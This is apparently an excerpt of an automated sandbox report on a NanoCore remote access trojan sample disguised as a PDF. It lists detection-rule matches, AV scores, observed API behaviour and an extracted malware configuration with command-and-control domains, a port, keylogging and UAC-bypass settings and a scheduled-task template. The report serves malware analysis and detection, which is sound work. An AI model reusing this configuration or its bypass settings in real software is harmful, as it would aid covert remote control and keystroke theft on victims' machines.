      Source: Yara matchFile source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR
      Multi AV Scanner detection for submitted file
      Source: 026910003102350.pdf.scr.exeReversingLabs: Detection: 46%
      Source: 026910003102350.pdf.scr.exeVirustotal: Detection: 45%Perma Link
      Multi AV Scanner detection for domain / URL
      Source: december2nd.ddns.netVirustotal: Detection: 12%Perma Link
      Source: december2n.duckdns.orgVirustotal: Detection: 5%Perma Link
      Source: december2nd.ddns.netVirustotal: Detection: 12%Perma Link
      Source: december2n.duckdns.orgVirustotal: Detection: 5%Perma Link
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeReversingLabs: Detection: 46%
      Source: 3.2.RegSvcs.exe.60b0000.7.unpackAvira: Label: TR/NanoCore.fadte
      Source: 19.2.RegSvcs.exe.d00000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "d95e5ad5-6193-4689-a919-7befded6", "Group": "ITEego", "Domain1": "december2n.duckdns.org", "Domain2": "december2nd.ddns.net", "Port": 60705, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Enable", "SetCriticalProcess": "Enable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Enable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 29996, "MutexTimeout": 4996, "LanTimeout": 2500, "WanTimeout": 8009, "BufferSize": "02000100", "MaxPacketSize": "", "GCThreshold": "", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
      Source: 026910003102350.pdf.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 026910003102350.pdf.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 026910003102350.pdf.scr.exe
      Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000003.00000000.380101330.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, RegSvcs.exe.2.dr
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000003.00000000.380101330.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, RegSvcs.exe.2.dr
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CCA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CEB348 FindFirstFileExA,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0038A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0038A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003865F1 FindFirstFileW,FindNextFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0034C642 FindFirstFileExW,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00387248 FindFirstFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003872E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,

      Networking

      barindex
      Uses dynamic DNS services
      Source: unknownDNS query: name: december2n.duckdns.org
      Source: unknownDNS query: name: december2nd.ddns.net
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: december2n.duckdns.org
      Source: Malware configuration extractorURLs: december2nd.ddns.net
      Source: Joe Sandbox ViewASN Name: SPD-NETTR SPD-NETTR
      Source: Joe Sandbox ViewIP Address: 212.193.30.230 212.193.30.230
      Source: Joe Sandbox ViewIP Address: 212.193.30.230 212.193.30.230
      Source: global trafficTCP traffic: 192.168.2.5:49700 -> 212.193.30.230:60705
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
      Source: unknownDNS traffic detected: queries for: december2n.duckdns.org
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0038D7A1 InternetReadFile,SetEvent,GetLastError,SetEvent,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037A54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0038F45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0038F45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,
      Source: RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: RegisterRawInputDevices
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003A9ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

      E-Banking Fraud

      barindex
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR

      Operating System Destruction

      barindex
      Protects its processes via BreakOnTermination flag
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: 01 00 00 00

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
